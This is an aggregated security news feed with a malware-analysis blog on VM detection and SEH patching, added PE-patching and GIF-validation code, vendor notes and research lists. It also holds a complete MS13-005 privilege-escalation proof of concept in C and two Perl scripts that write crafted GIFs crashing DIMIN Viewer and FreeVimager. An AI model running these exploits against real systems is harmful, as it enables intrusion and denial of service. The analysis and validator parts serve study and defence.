http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. 
However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase "forty-thousand hex". To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say "forty-thousand hex", they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsoft's C++ compiler. So why say "forty-thousand hex" instead of "four-hundred-thousand hex"? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2 digits (bytes) instead of in groups of 3 digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right to left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function:

    mov edx, [ebp+arg_0]
    add edx, 108h
    push edx

I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable, and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launched other instances of itself, and setting a breakpoint on the code above in a debugger didn't work, since the parent process never executed that code; only the child instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the child processes in a suspended state, attached a debugger to the child, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx).

I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program this would crash the child process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed child process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines, and because of this the int 3 exception was never passed to the operating system, so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following:

    mov eax, fs:[0]
    mov [eax+4], 7c8399f3h
    int 3

This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the child process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.
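The patch above can be prepared offline before the sample is run. The following is an added example (mine, not Geffner's) that encodes the three instructions as 32-bit x86 bytes, maps the RVA a disassembler shows to a file offset through the PE section table, and overwrites a fixed number of bytes with NOP padding. Encoded, the patch is 14 bytes, longer than the three instructions it replaces, so the number of bytes that may be overwritten is an explicit parameter and the patch is refused when it does not fit. The PE image, the assumption that arg_0 is [ebp+8], and the 5-byte call after `push edx` are all constructed for the example; the post states none of them.

```python
import struct

# Address of kernel32's default exception handler as quoted in the post for
# US English kernel32.dll 5.1.2600.2180. It is specific to that build.
KERNEL32_DEFAULT_HANDLER = 0x7C8399F3


def build_seh_patch(handler_addr: int) -> bytes:
    """Encode the three-instruction 32-bit patch from the post:
         mov eax, fs:[0]       ; head of the SEH chain (EXCEPTION_REGISTRATION*)
         mov [eax+4], handler  ; replace the first record's Handler field
         int 3                 ; raise the breakpoint the custom SEH would have eaten
    """
    mov_eax_fs0 = b"\x64\xA1" + struct.pack("<I", 0)                 # FS prefix + MOV EAX, moffs32
    mov_handler = b"\xC7\x40\x04" + struct.pack("<I", handler_addr)  # MOV dword [EAX+4], imm32
    int3 = b"\xCC"
    return mov_eax_fs0 + mov_handler + int3


def rva_to_file_offset(image: bytes, rva: int) -> int:
    """Map an RVA (what the disassembler shows) to the offset inside the PE file on disk."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                     # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", image, table + 40 * i + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            delta = rva - vaddr
            if delta >= rawsize:
                raise ValueError("RVA lies in the section's zero-filled tail, not in the file")
            return rawptr + delta
    raise ValueError(f"RVA {rva:#x} not covered by any section")


def patch_fits(patch: bytes, room: int) -> bool:
    """The patch may only clobber whole instructions the analyst has decided to sacrifice."""
    return len(patch) <= room


def apply_patch(image: bytes, file_offset: int, patch: bytes, room: int) -> bytes:
    """Overwrite `room` bytes at file_offset with patch, NOP-padding the remainder."""
    if not patch_fits(patch, room):
        raise ValueError(f"patch is {len(patch)} bytes but only {room} may be overwritten")
    if file_offset + room > len(image):
        raise ValueError("patch runs past end of file")
    padded = patch + b"\x90" * (room - len(patch))
    return image[:file_offset] + padded + image[file_offset + room:]


def build_sample_image() -> bytes:
    """Constructed minimal 32-bit PE layout (headers plus one .text section, not a
    runnable program) so the helpers above can be exercised offline."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section
    opt = bytes(0xE0)                                                  # contents irrelevant here
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400,
                       0, 0, 0, 0, 0x60000020)
    image = bytearray(0x600)
    hdr = bytes(dos) + b"PE\0\0" + coff + opt + text
    image[:len(hdr)] = hdr
    # The snippet from the post at RVA 0x1020, assuming arg_0 is [ebp+8] (an assumption):
    #   8B 55 08             mov edx, [ebp+8]
    #   81 C2 08 01 00 00    add edx, 108h
    #   52                   push edx
    # followed by a constructed 5-byte call that is sacrificed as well.
    image[0x420:0x42F] = bytes.fromhex("8B550881C20801000052E800000000")
    return bytes(image)


SAMPLE_IMAGE = build_sample_image()
SNIPPET_RVA = 0x1020
ROOM = 15   # 10 bytes of the snippet + the 5-byte call after it

if __name__ == "__main__":
    patch = build_seh_patch(KERNEL32_DEFAULT_HANDLER)
    off = rva_to_file_offset(SAMPLE_IMAGE, SNIPPET_RVA)
    print(f"patch ({len(patch)} bytes): {patch.hex()} -> file offset {off:#x}")
    patched = apply_patch(SAMPLE_IMAGE, off, patch, ROOM)
    print("patched bytes:", patched[off:off + ROOM].hex())
```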

==> FortiExplorer 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.1.0 B1038 and release notes are available for download from the Support site: https://support.fortinet.com
This concerns the following models:
* MS Windows 7, MS Windows Vista, MS Windows XP
* Mac OS X 10.6

==> MS13-005 (win32k.sys) exploit POC

http://rss.feedsportal.com/c/32479/f/477548/index.rss MS13-005 (win32k.sys) The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application. This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, and Windows RT. For more information, see the subsection, Affected and Non-Affected Software, in this section.

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>   /* EXIT_SUCCESS */
    #include <string.h>   /* strlen */

    int main()
    {
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        PCHAR payload[] = {
            "echo \"._ ___ __________ __________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"| | / \\ \\__ _/ | \\_ ___/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"|_\\__|__ / |__| \\_|_ /___ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \" ___ ._ ______ ____ _ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \" \\ \\ | |/ _/ / _/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \" / | \\| / \\ _/ \\ _ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \"\\__| /_|\\____ /\\__ /\\__| / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
            "exit",
            NULL
        };

        printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
        getchar();
        si.cb = sizeof(si);
        CreateProcess(
            NULL,
            "cmd.exe",
            NULL,
            NULL,
            TRUE,
            CREATE_NEW_CONSOLE,
            NULL,
            NULL,
            &si,
            &pi
        );
        Sleep(1000);

        // Yeah, you can "bruteforce" the index of the window..
        printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
        keybd_event(VK_LWIN, 0x5B, 0, 0);
        keybd_event(VK_LSHIFT, 0xAA, 0, 0);
        keybd_event(0x37, 0x87, 0, 0);
        keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
        keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
        keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
        Sleep(1000);

        printf("3] Killing now the useless low IL cmd.exe..\n");
        TerminateProcess(
            pi.hProcess,
            1337
        );

        printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
        printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");
        for(unsigned int i = 0; payload[i] != NULL; ++i)
        {
            for(unsigned int j = 0; j < strlen(payload[i]); ++j)
            {
                // Yeah, that's the fun part to watch ;D
                Sleep(10);
                SendMessage(
                    HWND_BROADCAST,
                    WM_CHAR,
                    payload[i][j],
                    0
                );
            }
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                VK_RETURN,
                0
            );
        }
        return EXIT_SUCCESS;
    }

Tags: exploit, poc, win32k.sys, windows

==> DIMIN Viewer 5.4.0 DoS PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

    #!/usr/bin/perl
    # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution
    # Author: Jean Pascal Pereira <pereira@secbiz.de>
    # Vendor URI: http://www.dimin.net
    # Vendor Description:
    # View images in countless formats, and apply a variety of effects with this small, fast, and powerful
    # application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool
    # and Big Image Navigator. It also features multi language interface to feel yourself at home!
    #
    # Debug info (Microsoft (R) Windows Debugger Version 6.11.0001.404 X86, crash excerpt):
    # CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif
    # Symbol search path is: * Invalid *
    # (fdc.b98): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
    # eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
    # *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
    # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -
    # div5_xtd_formats!divGetFilter+0x80c8b:
    # 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
    #
    # 0:000> r;!exploitable -v;q
    # Executing Processor Architecture is x86
    # Debuggee is in User Mode
    # Debuggee is a live user mode debugging session on the local machine
    # Event Type: Exception
    # Exception Faulting Address: 0x1471000
    # First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
    # Exception Sub-Type: Write Access Violation
    #
    # Exception Hash (Major/Minor): 0x550b2f71.0x55423571
    #
    # Stack Trace:
    # div5_xtd_formats!divGetFilter+0x80c8b
    # div5_xtd_formats!divGetFilter+0x80d0a
    # div5_xtd_formats+0xc821
    # div5_xtd_formats+0xcc07
    # Instruction Address: 0x0000000000fb1a7b
    #
    # Proof of Concept:

    use strict;
    use warnings;

    my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00".
                  "\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00".
                  "\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF".
                  "\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04".
                  "\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE".
                  "\x04\xF0";

    # Write the bytes unmodified (":raw" disables newline translation).
    open(my $fh, ">:raw", "crafted.gif") or die "cannot write crafted.gif: $!";
    print $fh $crafted;
    close($fh);

==> FreeVimager 4.1.0 DoS PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

    #!/usr/bin/perl
    # FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution
    # Author: Jean Pascal Pereira <pereira@secbiz.de>
    # Vendor URI: http://www.contaware.com
    # Vendor Description:
    # This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files,
    # ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this
    # Freeware is to be a small and handy tool doing what it says and running also as a standalone
    # exe file (installer not necessary).
    #
    # Debug info (Microsoft (R) Windows Debugger Version 6.11.0001.404 X86, crash excerpt):
    # CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif
    # Symbol search path is: * Invalid *
    # (e48.568): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
    # eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
    # *** WARNING: Unable to verify checksum for image00400000
    # *** ERROR: Module load completed but symbols could not be loaded for image00400000
    # image00400000+0x1c02c3:
    # 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=????????
    #
    # 0:000> r;!exploitable -v;q
    # Executing Processor Architecture is x86
    # Debuggee is in User Mode
    # Debuggee is a live user mode debugging session on the local machine
    # Event Type: Exception
    # Exception Faulting Address: 0x2151c154
    # First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
    # Exception Sub-Type: Write Access Violation
    #
    # Exception Hash (Major/Minor): 0x50747228.0x58333273
    #
    # Stack Trace:
    # image00400000+0x1c02c3
    # image00400000+0x1bfd07
    # image00400000+0x18abb4
    # kernel32!VirtualAllocEx+0x47
    # kernel32!VirtualAlloc+0x18
    # image00400000+0x18a0ef
    # image00400000+0x18a121
    # image00400000+0x24fb01
    # image00400000+0x24fc4e
    # image00400000+0x23be55
    # image00400000+0x95a48
    # image00400000+0x4fd8
    # image00400000+0xf054e
    # image00400000+0xea85e
    # ntdll!RtlFreeHeap+0x130
    # ntdll!RtlFreeHeap+0x130
    # kernel32!CreateActCtxW+0xb6c
    # kernel32!CreateActCtxW+0xcbf
    # Instruction Address: 0x00000000005c02c3
    #
    # Proof of Concept:

    use strict;
    use warnings;

    my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5".
                  "\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE".
                  "\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78".
                  "\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8".
                  "\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F".
                  "\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0".
                  "\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73".
                  "\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00".
                  "\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60";
    my $junk = "\x90" x 163;

    # Write the bytes unmodified (":raw" disables newline translation).
    open(my $fh, ">:raw", "crafted.gif") or die "cannot write crafted.gif: $!";
    print $fh $crafted.$junk;
    close($fh);
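Both of the PoCs above (DIMIN Viewer and FreeVimager) write a GIF whose structure can be rejected before any decoder touches the pixel data. The following is an added example (mine, not Pereira's) that walks the GIF block structure in Python, embeds both crafted files byte for byte from the scripts above plus a constructed well-formed 1x1 image, and reports the first malformation found. In both crafted files that is the LZW minimum code size byte (0xFE and 0xFB) where a real frame carries 2 through 8; whether that byte alone is what the two viewers mishandle is not established by the crash logs.

```python
import struct


class GifError(ValueError):
    """Structural problem found while walking a GIF file."""


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance over a chain of length-prefixed data sub-blocks up to the 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise GifError("truncated data sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        if pos + n > len(data):
            raise GifError(f"data sub-block of {n} bytes runs past end of file")
        pos += n


def parse_gif(data: bytes) -> dict:
    """Walk header, colour tables, extensions, image descriptors and trailer, raising
    GifError on any malformation, without decoding the LZW pixel data."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise GifError("bad GIF signature or header too short")
    width, height, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    pos = 13
    gct_entries = 0
    if packed & 0x80:                                   # global colour table present
        gct_entries = 2 ** ((packed & 0x07) + 1)
        if pos + 3 * gct_entries > len(data):
            raise GifError("truncated global colour table")
        pos += 3 * gct_entries
    images = []
    while True:
        if pos >= len(data):
            raise GifError("missing trailer (0x3B)")
        introducer = data[pos]
        pos += 1
        if introducer == 0x3B:                          # trailer
            break
        if introducer == 0x21:                          # extension: label, then sub-blocks
            if pos >= len(data):
                raise GifError("truncated extension")
            pos = _skip_sub_blocks(data, pos + 1)
        elif introducer == 0x2C:                        # image descriptor
            if pos + 9 > len(data):
                raise GifError("truncated image descriptor")
            left, top, iw, ih, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if left + iw > width or top + ih > height:
                raise GifError("image rectangle exceeds the logical screen")
            if ipacked & 0x80:                          # local colour table
                pos += 3 * (2 ** ((ipacked & 0x07) + 1))
            if pos >= len(data):
                raise GifError("missing LZW minimum code size")
            min_code = data[pos]
            pos += 1
            # 2..8 covers the 2- to 256-colour frames GIF can index; GIF LZW codes never
            # exceed 12 bits, so a starting width of 254 or 251 cannot be legitimate.
            if not 2 <= min_code <= 8:
                raise GifError(f"invalid LZW minimum code size {min_code}")
            pos = _skip_sub_blocks(data, pos)
            images.append((left, top, iw, ih, min_code))
        else:
            raise GifError(f"unknown block introducer 0x{introducer:02x} at offset {pos - 1}")
    return {"screen": (width, height), "gct_entries": gct_entries, "images": images}


def classify(data: bytes) -> str:
    """'ok' for a structurally sound file, otherwise the first malformation found."""
    try:
        parse_gif(data)
        return "ok"
    except GifError as err:
        return str(err)


# The two crafted files from the PoCs above, byte for byte.
DIMIN_POC = bytes.fromhex(
    "47494638396130002C00B30000000000" "80000000800080800000008080008000"
    "8080808080C0C0C0FF000000FF00FFFF" "000000FFFF00FF00FFFFFFFFFF21F904"
    "0100000F002C0000000030002C0000FE" "04F0")
FREEVIMAGER_POC = bytes.fromhex(
    "47494638396118001800C40000A2C5" "E1EBF3F98CB8DA498EC395BDDCFEFE"
    "FF75AAD33884BED5E5F15D9ACA2678" "B82276B7C4DAECDDEAF45596C8F4F8"
    "FC89B5D8F1F6FA2879B887B5D8317F" "BC2377B89EC3E09EC3DF68A1CEE6F0"
    "F7FAFCFD1F74B68EB9DAFFFFFF1E73" "B51E74B621F90400000000002C0000"
    "00001800180000FB0560") + b"\x90" * 163
# Constructed well-formed 1x1 image for comparison (no colour table, one data sub-block).
VALID_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)
             + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
             + b"\x02" + b"\x02\x44\x01" + b"\x00" + b"\x3B")

if __name__ == "__main__":
    for name, blob in (("DIMIN PoC", DIMIN_POC), ("FreeVimager PoC", FREEVIMAGER_POC),
                       ("valid 1x1", VALID_GIF)):
        print(f"{name:16s}: {classify(blob)}")
```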

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois.

==> Flame Windows Update Attack Could Have Been Repeated in 3 Days, Says Microsoft

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://www.wired.com/threatlevel/2013/03/flame-windows-update-copycat/ By Kim Zetter Threat Level Wired.com 03.01.13 When the sophisticated state-sponsored espionage tool known as Flame was exposed last year, there was probably no one more concerned about the discovery than Microsoft, after realizing that the tool was signed with an unauthorized Microsoft certificate to verify its trustworthiness to victim machines. The attackers also...

==> Microsoft Windows multiple security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Quartz.dll memory corruption, .Net privilege escalation, multiple kernel race conditions, CSRSS privilege escalation, TCP/IP DoS. Applications: Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server (02.03.2013)

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects.

Papers and Posts
------------
* FireStarter: Agile Development and Security
* Comments on Microsoft Simplified SDL
* Rock Beats Scissors, and People Beat Process
* FireStarter: Secure Development Lifecycle – You’re Doing It Wrong
* Structured Security Program, Meet Agile Process
* FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure
* Are Secure Web Apps Possible?
* Clickjacking Details, Analysis, and Advice

Presentations
---------
* Security + Agile = FAIL

Podcasts, Webcasts, and Multimedia
---------
We do not currently have multimedia for this topic.

Vendors
---
We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits.
* Cigital
* HP (SpiDynamics, Fortify)
* IBM (Ounce)
* Veracode
* WhiteHat Security

==> Encryption

http://securosis.com/feeds/research
Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)
1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution.
2. Your Simple Guide to Endpoint Encryption.
3. Post on the Three Laws of Data Encryption.
4. Format and Datatype Preserving Encryption.
5. Post on When to Layer Encryption.
6. Application vs. Database Encryption.
7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats.
8. The Data Security Lifecycle covers encryption during the movement and storage of data.

General Coverage
------------
1. Tokenization Will Become the Dominant Payment Transaction Architecture
2. Visa’s Data Field Encryption
3. Boaz Nails It- The Encryption Dilemma
4. “PIN Crackers” and Data Security, looking at attacks on encryption.
5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security.
6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission.
7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection.

Presentations
---------
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* This presentation is on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
---------
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Enterprise/General Encryption Providers
* Certicom
* CheckPoint
* Entrust
* GuardianEdge
* IBM
* nuBridges
* Prime Factors Inc.
* RSA
* SafeNet
* Sophos (Utimaco)
* Symantec (PGP)
* Thales (nCipher)
* TrueCrypt
* Venafi
* Voltage
* Vormetric
* WinMagic

Endpoint Encryption Vendors
* beCrypt
* Credant
* DESLock
* McAfee (SafeBoot)
* Microsoft (BitLocker)
* Namo
* Secude
* Secuware

Database Encryption Vendors
* IBM
* NetLib
* Oracle
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (nCipher)
* Voltage
* Vormetric

Key Management, Certificate and other tools
* Entrust
* Prime Factors Inc.
* RSA
* Symantec (Verisign)
* Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this we need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but because they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks.

Papers and Posts
------------
* Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete.
* Securing the Cloud with Virtual Private Storage.
* How The Cloud Destroys Everything I Love about Web Application Security.

Presentations
---------
* Understanding Cloud Security in 30 Minutes or Less!

Podcasts, Webcasts and Multimedia
---------
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> local - Microsoft Windows XP Professionnel Service Pack 2 & 3 Insecure Library Load

http://www.1337day.com/rss

==> remote - MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free

http://www.1337day.com/rss

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Microsoft shows off big data, big-screen prototypes at research fair

